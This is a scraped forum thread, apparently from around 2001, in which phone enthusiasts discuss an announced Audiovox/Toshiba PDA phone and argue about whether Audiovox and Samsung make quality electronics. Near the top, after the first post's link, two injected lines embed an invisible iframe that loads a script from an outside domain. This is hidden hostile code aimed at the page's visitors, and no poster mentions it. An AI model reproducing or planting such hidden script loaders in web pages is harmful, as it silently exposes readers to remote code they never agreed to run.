+ Reply to Thread
Page 1 of 2 1 2 LastLast
    i300 User

New Audiovox PDA/Cellphone

http://www.audiovox.com/pressrelease...c_010320-7.htm

gf<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

damn, no pictures.

audiovox is more lower-end stuff......but i gess we cant discount this one yet.

If it's not a Palm, it's borderline PDA. I wouldn't waste my money on anything that's not Palm (although if only CE was an option, I would think a little harder about it...)

Anybody considering this phone would likely be better off buying a decent phone and an entry level Palm (ie m100). Probably cost only a little more, but be a much, much better solution.
    Cliff

Audiovox also private labels the new Toshiba Pocket PC, so chances are if Toshiba is making a PDA Phone, this is similar. Another interesting thing from the press release is:

"The wireless personal digital communicator will also be quipped with word processing software, ..."

Apparently the press release was not written on a computer quipped with spellcheck.

It sounds interesting though, but time will tell.

And another thing, the Press Release is dated MARCH 20, 2001!!!!

I guess they missed the deadline.

------------------------------------------------
    HAUPPAUGE, NY - (March 20, 2001)

Lets remember that Samsung hasn't always been ranked at the top of the list in quality either my friend. I do understand your point and would be wary, but it would be worth examining.

I agree with mjorange to an extent.

I've been around long enough and buying electronic stuff to remember teh early 80s when Samsung was just some more cheap crap from Korea, of all places. Anything from China or Korea was known as chinsy. The stuff worked but was certainly not on par with Japanese produced electronics. I watched them evolve over the last two decades and they make some pretty good stuff now.

Now the other side of the coin is that Audiovox has been around for some time now and hasn't really exhibited strong signs of improvements. Am I to believe that this will suddenly change with a new cell/pda phone that they are going to produce in the near future??? Well we are just going to have to wait and see.

Bear in mind also that there is a lot more cross-pollination going on between specialty companies now (just look at the Qualcomm sticker on the back of your I300). Who knows where some of the electronics will come from on an Audiovox phone. This could either be a piece of crap or a decent little toy. We'll just have to wait and see.

Just my .02 ,,,
    Let he who is without sin cast the first stone.

OUCH!!!

You make very good points my friend.

i300 User
    They had one of these on display at Comdex. It is made by Toshiba. It will be running PocketPC 2002. It is a CDMA phone - so Verizon/Sprint will be the carriers here in the US.

I dug up this release after seeing the phone - trying to dig up more info on it before it is released but this is the only reference they make to it on Audiovox's site.

gf

i300 User
    Here ya go - just found this on Microsoft's site. Scroll down - it is about the 3rd or 4th product reviewed...

http://msn.zdnet.com/zdfeeds/msncobr...uide%2C00.html

gf

Is that the pic of the Audiovox/Toshiba? I don't know...I think my I300 looks better than everything else developed!

I don't think that is the Audiovox/Toshiba unit. It's just one of the three or so,,, or just something they found to photograph. It looks more like a Compaq Ipaq.

OUCH!!!

Administrator

Arrow

wake up guys...

audiovox IS cheap and always will be...

samsung in my eyes has always been low on the pole also, but these days everything is being made from different manufacturers... but i would not buy audiovox anything!!! i mean... do you guys remember sparkomatic? its just a tad cheaper than audiovox...

... ill pass...

Sparkomatic???

Best speakers you could buy for $5

Geez dude, you're taking a chance at showing your age here...

OUCH!!!

Well isn't that the whole point Marc? We don't know who makes a lot of the products we purchase; only the brand which is shown. As we see with this phone being dubbed Toshiba. Do you honestly think that if this phone were released, say, this summer that the majority of the consumers would ever know it was made by audiovox. Or that sexy YOPY PDA. Think anyone would have known it wasn't made by Samsung?

I don't think so friend.

Administrator

Arrow

they may or may not, but i will, and as far as im concerned, i wont get it!

that my point my friend...

Okay Marc,

I'm about to show my age. I remember when Japanese products were crap. You take the cheeziest and crappiest product that you can find from "made in China" and then you have a rough idea of what Japanese stuff was like in the early 60s. Well things changed and by the mid 70s the whole "made in Japan" meant something entirely differnet.

The "little dragons" have also been a'changin. But obviously you are going to hold onto previous issues for some reason. If I've learned nothing else over the years, I've certainly learned that whatever happened yesterday is history. You either adapt to change or sit in a corner with a bunch of grumpy old farts and complain about other people not knowing any better.

I can't change your mind and neither can anybody else but the rest of us believe that if something is good it doesn't really matter whos name is on it. And as far as Audiovox is concerned,,, at least they have stayed in business for several years. That's a hell of a lot better than all the companies who aren't around anymore. That gives me some comfort that if I buy one of their products I will have a good chance of getting support when I need it.

OUCH!!!

Administrator

Arrow

they may or may not, but i will, and as far as im concerned, i wont get it!
    :p

(raises his hand).. i guess ill be that ol' fart in the coerner afraid of change...

as they say, you can shine up sh*t as shiney as possibile, but its still sh*t...

So you ARE on today... good mornin.

OUCH!!!